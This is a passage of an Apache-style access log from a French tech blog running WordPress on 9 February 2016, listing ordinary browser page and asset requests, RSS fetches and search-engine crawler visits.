SimplePie/1.4-dev-FreshRSS\"\n41.66.28.100 - - [09/Feb/2016:05:42:20 -0800] \"GET /wp-content/uploads/2015/06/sylvia.png HTTP/1.1\" 200 124528 \"http://www.silicon-valley.fr/lentrepreneuriat-aventure-parsemee-echecs/\" \"Mozilla/5.0 (Linux; U; Android 4.0.4; fr-fr; GT-S7562 Build/IMM76I) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\"\n92.151.95.5 - - [09/Feb/2016:05:53:09 -0800] \"GET /wp-content/uploads/2015/06/sylvia.png HTTP/1.1\" 200 803660 \"http://www.silicon-valley.fr/interview-orny-impenge-silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n109.15.143.216 - - [09/Feb/2016:06:00:11 -0800] \"GET /du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n109.15.143.216 - - [09/Feb/2016:06:00:23 -0800] \"GET /du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n176.128.169.10 - - [09/Feb/2016:06:01:31 -0800] \"GET /wp-content/uploads/2015/06/sylvia.png HTTP/1.1\" 200 803660 \"http://www.silicon-valley.fr/zone-confort-apprentissage/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4\"\n198.58.102.96 - - [09/Feb/2016:06:13:58 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n109.15.143.216 - - [09/Feb/2016:06:14:51 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n109.15.143.216 - - [09/Feb/2016:06:15:03 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n62.17.146.185 - - [09/Feb/2016:06:20:27 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.17.146.185 - - [09/Feb/2016:06:20:27 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-1024x683.jpg HTTP/1.1\" 200 115506 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n198.58.103.36 - - [09/Feb/2016:06:30:34 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n193.251.95.123 - - [09/Feb/2016:06:33:15 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.251.95.123 - - [09/Feb/2016:06:33:15 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.251.95.123 - - [09/Feb/2016:06:33:15 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.251.95.123 - - [09/Feb/2016:06:33:15 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.251.95.123 - - [09/Feb/2016:06:33:16 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.251.95.123 - - [09/Feb/2016:06:33:17 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.251.95.123 - - [09/Feb/2016:06:33:19 -0800] \"GET /marie-amelie-frere-la-serial-entrepreneure-a/ HTTP/1.1\" 200 9889 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n54.176.128.185 - - [09/Feb/2016:06:40:50 -0800] \"GET /rss HTTP/1.1\" 304 182 \"-\" \"Digg Feed Fetcher 1.0 (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n163.5.250.131 - - [09/Feb/2016:06:45:25 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\"\n163.5.250.131 - - [09/Feb/2016:06:45:25 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3601 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\"\n163.5.250.131 - - [09/Feb/2016:06:45:25 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\"\n163.5.250.131 - - [09/Feb/2016:06:45:25 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\"\n163.5.250.131 - - [09/Feb/2016:06:45:25 -0800] \"GET /wp-content/uploads/2014/05/tumblr_inline_n636u5g0bD1sygmpd-50x50.jpg HTTP/1.1\" 200 2371 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\"\n163.5.250.131 - - [09/Feb/2016:06:45:26 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\"\n80.13.10.184 - - [09/Feb/2016:06:45:49 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15572 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n80.13.10.184 - - [09/Feb/2016:06:45:51 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [09/Feb/2016:06:46:02 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n41.225.136.131 - - [09/Feb/2016:06:50:25 -0800] \"GET /creer-sa-startup-seul-et-la-revendre-a-un-geant/ HTTP/1.1\" 200 10065 \"https://www.google.tn/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n41.225.136.131 - - [09/Feb/2016:06:50:27 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n41.225.136.131 - - [09/Feb/2016:06:50:27 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n41.225.136.131 - - [09/Feb/2016:06:50:27 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2049 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n41.225.136.131 - - [09/Feb/2016:06:50:27 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n41.225.136.131 - - [09/Feb/2016:06:50:28 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n41.225.136.131 - - [09/Feb/2016:06:50:28 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n5.9.85.4 - - [09/Feb/2016:06:55:01 -0800] \"GET /marketing-pour-developpeurs-partie-1/ HTTP/1.0\" 200 11577 \"-\" \"Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)\"\n198.58.103.115 - - [09/Feb/2016:06:55:18 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n80.201.59.78 - - [09/Feb/2016:07:00:26 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7663 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie-particuliere-du\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.201.59.78 - - [09/Feb/2016:07:00:26 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2049 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie-particuliere-du\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.201.59.78 - - [09/Feb/2016:07:00:26 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie-particuliere-du\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.201.59.78 - - [09/Feb/2016:07:00:26 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie-particuliere-du\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.201.59.78 - - [09/Feb/2016:07:00:26 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n198.58.103.102 - - [09/Feb/2016:07:03:34 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n173.234.159.250 - - [09/Feb/2016:07:03:38 -0800] \"GET /steve-marx-developer-advocate-dropbox HTTP/1.0\" 301 352 \"-\" \"Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)\"\n173.234.159.250 - - [09/Feb/2016:07:03:44 -0800] \"GET /office-tour-de-rackspace-san-francisco-avec HTTP/1.0\" 301 358 \"-\" \"Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)\"\n91.223.84.10 - - [09/Feb/2016:07:05:33 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n91.223.84.10 - - [09/Feb/2016:07:05:33 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 867 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n91.223.84.10 - - [09/Feb/2016:07:05:33 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n91.223.84.10 - - [09/Feb/2016:07:05:33 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n91.223.84.10 - - [09/Feb/2016:07:05:33 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n91.223.84.10 - - [09/Feb/2016:07:05:33 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n2.1.201.36 - - [09/Feb/2016:07:06:15 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n178.154.189.201 - - [09/Feb/2016:07:11:01 -0800] \"GET /category/portraits/ HTTP/1.1\" 200 7341 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n81.252.96.8 - - [09/Feb/2016:07:14:20 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 304 212 \"-\" \"Mozilla/4.0 (compatible;)\"\n180.76.15.138 - - [09/Feb/2016:07:19:03 -0800] \"GET / HTTP/1.1\" 200 33366 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n82.226.78.218 - - [09/Feb/2016:07:20:04 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:20:04 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:20:04 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:20:04 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 415 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:20:04 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:20:05 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:20:07 -0800] \"GET /wp-content/uploads/2015/03/Photo-Bio-2013-50x50.jpg HTTP/1.1\" 200 2609 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n198.58.103.160 - - [09/Feb/2016:07:20:35 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n82.226.78.218 - - [09/Feb/2016:07:21:27 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:21:27 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:21:28 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:21:28 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:21:28 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"-\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:21:28 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:21:30 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:21:31 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:21:31 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:21:31 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:21:31 -0800] \"GET /wp-content/uploads/2014/09/tumblr_inline_nbjvoh6HDc1sa6hof-50x50.jpg HTTP/1.1\" 200 2074 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:21:32 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 986 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.31.68.56 - - [09/Feb/2016:07:21:43 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3601 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/47.0.2526.73 Chrome/47.0.2526.73 Safari/537.36\"\n109.31.68.56 - - [09/Feb/2016:07:21:43 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/47.0.2526.73 Chrome/47.0.2526.73 Safari/537.36\"\n109.31.68.56 - - [09/Feb/2016:07:21:43 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/47.0.2526.73 Chrome/47.0.2526.73 Safari/537.36\"\n109.31.68.56 - - [09/Feb/2016:07:21:43 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/47.0.2526.73 Chrome/47.0.2526.73 Safari/537.36\"\n109.31.68.56 - - [09/Feb/2016:07:21:43 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/47.0.2526.73 Chrome/47.0.2526.73 Safari/537.36\"\n109.31.68.56 - - [09/Feb/2016:07:21:43 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/47.0.2526.73 Chrome/47.0.2526.73 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:22:30 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/45.0.2454.101 Chrome/45.0.2454.101 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:22:31 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 504 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/45.0.2454.101 Chrome/45.0.2454.101 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:22:31 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/45.0.2454.101 Chrome/45.0.2454.101 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:22:31 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/45.0.2454.101 Chrome/45.0.2454.101 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:22:31 -0800] \"GET /wp-content/uploads/2014/05/Screen-Shot-2015-02-22-at-12.33.02-AM-50x50.png HTTP/1.1\" 200 4803 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/45.0.2454.101 Chrome/45.0.2454.101 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:22:32 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/45.0.2454.101 Chrome/45.0.2454.101 Safari/537.36\"\n82.226.78.218 - - [09/Feb/2016:07:22:48 -0800] \"GET /guillaume-charmes-meilleur-developpeur-du-monde/ HTTP/1.1\" 200 8246 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:22:49 -0800] \"GET 